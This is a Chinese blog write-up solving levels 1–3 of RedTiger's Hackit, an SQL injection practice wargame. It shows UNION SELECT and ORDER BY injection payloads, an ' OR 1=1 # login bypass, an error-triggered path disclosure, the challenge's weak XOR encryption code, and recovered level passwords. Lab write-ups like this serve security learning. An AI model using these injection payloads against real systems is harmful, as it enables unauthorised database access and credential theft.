RedTiger‘s Hackit

最新推荐文章于 2024-06-02 14:54:06 发布
最新推荐文章于 2024-06-02 14:54:06 发布
阅读量915 收藏 22
点赞数 22
文章标签: 数据库 web安全 安全 php linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74606212/article/details/136519759
版权

本文相关的ctf平台链接:RedTiger's Hackit (overthewire.org)

level 1

这里有个1可以点,先尝试点一下

因为这题是sql注入,cat应该就是注入点了

先判断注入类型

?cat=1 and 1=1
?cat=1 and 1=2

数字型注入

再判断列数

1 order by 4 --+

 

 接下来判断数据显示点

?cat=1 union select 1,2,3,4 from level1_users --+

这里可以直接爆破用户名和密码(之前还一步步走,但发现不通)

?cat=1 union select 1,2,username,password from level1_users --+

Hornoxe
thatwaseasy 

完成 

passwords_will_change_over_time_let_us_do_a_shitty_rhyme

level 2

万能密码秒了

1
' OR 1=1 #
//这里--+无法成功

feed_the_cat_who_eats_your_bread

level 3

开始没什么思路,就开始瞎传了,没想到发现路径了

?usr[]=0

 访问/urlcrypt.inc

 源代码:

<?php

	// warning! ugly code ahead :)
	// requires php5.x, sorry for that
  		
	function encrypt($str)
	{
		$cryptedstr = "";
		srand(3284724);
		for ($i =0; $i < strlen($str); $i++)
		{
			$temp = ord(substr($str,$i,1)) ^ rand(0, 255);
			
			while(strlen($temp)<3)
			{
				$temp = "0".$temp;
			}
			$cryptedstr .= $temp. "";
		}
		return base64_encode($cryptedstr);
	}
  
	function decrypt ($str)
	{
		srand(3284724);
		if(preg_match('%^[a-zA-Z0-9/+]*={0,2}$%',$str))
		{
			$str = base64_decode($str);
			if ($str != "" && $str != null && $str != false)
			{
				$decStr = "";
				
				for ($i=0; $i < strlen($str); $i+=3)
				{
					$array[$i/3] = substr($str,$i,3);
				}

				foreach($array as $s)
				{
					$a = $s ^ rand(0, 255);
					$decStr .= chr($a);
				}
				
				return $decStr;
			}
			return false;
		}
		return false;
	}
?>

  1. encrypt 函数接受一个字符串作为参数,然后对该字符串进行加密。它将字符串中的每个字符与一个随机生成的 0 到 255 之间的整数进行异或操作,然后将结果转换为三位的字符串。最后,将所有加密后的字符串连接起来,然后进行 Base64 编码,返回加密后的结果。

  2. decrypt 函数接受一个经过加密的字符串作为参数,然后对其进行解密。首先,它会检查字符串是否符合 Base64 编码的格式。如果符合,就对字符串进行解码。然后,它将解码后的字符串每三个字符切割成一个数组元素。接着,对数组中的每个元素执行异或操作,与之前加密时使用的相同随机数进行异或,然后将结果转换为字符,并连接起来,得到解密后的结果。

 直接写sql注入然后加密再传过去就可以了

这里window解码会乱码,linux可以但是8.2版本的太高了

所以就直接给答案了

参考writeup--RedTiger's Hackit-CSDN博客

?str=MDc2MTUxMDIyMTc3MTM5MjMwMTQ1MDI0MjA5MTAwMTc3MTUzMDc0MTg3MDk1MDg0MjQzMDE3MjUyMDI1MTI2MTU2MTc2MTMzMDAwMjQ2MTU2MjA4MTgyMDk2MTI5MjIwMDQ5MDUyMjMwMTk4MTk2MTg5MTEzMDQxMjQwMTQ0MDM2MTQwMTY5MTcyMDgzMjQ0MDg3MTQxMTE1MDY2MTUzMjE0MDk1MDM4MTgxMTY1MDQ3MTE4MDg2MTQwMDM0MDg1MTE4MTE4MDk5MjIyMjE4MDEwMTkwMjIwMDcxMDQwMjIw

 admin

thisisaverysecurepasswordEEE5rt

put_the_kitten_on_your_head 

未完待续!!! 

orzw
关注
  • 22
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
RedTiger's Hackit Level 3
GTMer的专栏
10-29 713
usr采用了某种编码,usr[0]=? 使php报错,得到加密代码路径。 php加密代码中使用了srand定义了种子,因此其后每次rand()值都是固定的。 可能是由于php版本不同,我加解密得到的结果和网站不一样,由于rand()算法不同?
writeup--RedTiger's Hackit
charlie_heng的专栏
12-19 4125
RedTiger’s Hackit第一关首先点进Category 1 网址后面跟了?cat=1,很明显是一个sql注入 看了下还给了表名。。Tablename: level1_users 构造了下 https://redtiger.labs.overthewire.org/level1.php?cat=1 union select 1,2,username,password from le
RedTiger's Hackit(level2)
xz913400155的博客
12-11 473
第二关 简单的sql绕过 https://redtiger.labs.overthewire.org/ 进入第二关 给的目标是登入 提示是条件 然后就给了用户名及密码两个输入框 很容易就联想到输入内容就是查询语句中where的判断条件 账号密码一般都是用字符串格式 所以猜测where语句差不多是如下格式 where username=‘我们的输入’ and password=‘我们的输入’ 然...
RedTiger‘s Hackit -- level 10
qq_42303523的博客
07-27 1076
RegTiger's hackit level 10的解法和原理
RedTiger's Hackit Level 2
GTMer的专栏
10-27 729
username处注入 a' or 'a' = 'a' -- d    不行,应该是把后面frome table给注释掉的原因。 由于and的优先级高于or,因此在username后注入的or语句和password判断and在一起,不管用。 在password后注入or语句,get !
书籍学习|基于SprinBoot+vue的书籍学习平台(源码+数据库+文档)
JIngJaneIL的博客
05-28 1245
首先,论文一开始便是清楚的论述了平台的研究内容。其次,剖析平台需求分析,弄明白“做什么”,分析包括业务分析和业务流程的分析以及用例分析,更进一步明确平台的需求。然后在明白了平台的需求基础上需要进一步地设计平台,主要包罗软件架构模式、整体功能模块、数据库设计。本项目软件架构选择B/S模式和java技术,总体功能模块运用自顶向下的分层思想。再然后就是实现平台并进行代码编写实现功能。论文的最后章节总结一下自己完成本论文和开发本项目的心得和总结。通过书籍学习平台将会使书籍学习各个方面的工作效率带来实质性的提升。
如何mysql数据导入到mongdb
codemami的博客
05-30 1394
由于MySQL和MongoDB的数据模型不同(例如,MySQL使用关系模型,而MongoDB使用文档模型),你可能需要转换数据的格式。使用MongoDB驱动程序:你也可以使用MongoDB的官方驱动程序(如Python的pymongo)来编写脚本,将数据直接插入到MongoDB中。注意:如果你的JSON文件包含多个文档,并且它们不是作为数组的一部分(即每个文档都在其自己的行上),则需要使用--jsonArray选项。手动转换:对于小型数据集,你可以手动编辑SQL或CSV文件,将其转换为JSON格式。
oracle中的INTERVAL函数学习总结
weixin_42821740的博客
05-30 483
简单学懂interval函数
行列视(RCV)能否在指定时间生成报表数据?
2401_83701843的博客
05-30 183
需要注意的是,要实现指定时间生成报表数据的功能,用户需要确保行列视(RCV)系统已经正确配置并连接了相应的数据源,同时还需要根据实际需求进行报表格式和计算逻辑的设置。此外,系统的稳定性和性能也是影响报表生成的重要因素,用户需要确保系统能够正常运行并处理大量的数据。其次,关于指定时间生成报表数据的需求,用户可以通过行列视(RCV)的定时任务功能来实现。综上所述,行列视(RCV)具备在指定时间生成报表数据的能力,但具体实现方式需要根据系统的配置和使用需求来确定。
chat4-Server端保存聊天消息到mysql
最新发布
gulanga5的博客
06-02 756
本文档描述了Server端接收到Client的消息并转发给所有客户端或私发给某个客户端同时将聊天消息保存到mysql服务端为当前客户端创建一个线程,此线程接收当前客户端的消息并转发给所有客户端或私发给某个客户端同时将聊天消息保存到mysql本文档主要总结了将聊天消息保存到mysql!!!),;import;import;import;/**用druid连接池来连接数据库的工具类*/DBUtil。
项目更换服务器时间少8小时
记录点滴
06-01 255
可以参考这位大佬的修正方法传送门。但是改完后记得重启项目!在项目的数据库连接加入。查看当前的linux系统时间。查看当前linux硬件时间。把硬件时间同步到系统时间。
mysql实战——mysql主从复制管理
zyjzyjjyzjyz的博客
05-28 624
一、常见的管理操作1、查看主库状态2、查看从库复制的状态3、在主库上查看从库ip和端口信息。
[解决]windows mysql8.0.x误删除root,解决办法
weixin_46626971的博客
05-29 198
b. 确保mysql安装路径下的data文件夹下的ibdata1文件有写入权限。,这在mysql8.0之后的版本已经不在试用了,所以改为输入。:a. 很多解决办法是输入。
SpringBoot 的 Java 代码配置(二)
xiaotu的博客
05-29 1187
因此,如果使用 HikariCP 只用声明你要用它就行,而声明要使用 Druid,你需要自己指定所使用的版本。上面的 DruidDataSource ,我们为其属性赋值时,它的四个属性都是简单类型属性,因此十分容易处理。但是,在 Spring 的容器中,Java Bean 可能会存在引用。在上面的 Druid 的配置中,数据库连接的四大属性值是在代码中『写死』的。而在 Java 代码配置中,通过 @Bean 方法的入参来表达 Bean 之间的引用关系。,所以,我们可以直接将自定义的配置项写在。
【MySQL】索引
cefler的博客
05-31 824
【MySQL】索引
KeyExpirationEventMessageListener监听器的使用
qq_47910339的博客
05-31 469
KeyExpirationEventMessageListener监听器的使用
【问题解决】MySQL恢复数据库报错Unknown command ‘\‘‘.
拾级而上
06-01 195
MySQL恢复数据库报错Unknown command '\''.
爬虫面试手册
u010926168的博客
05-24 1990
爬虫岗位要求和常见面试题

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值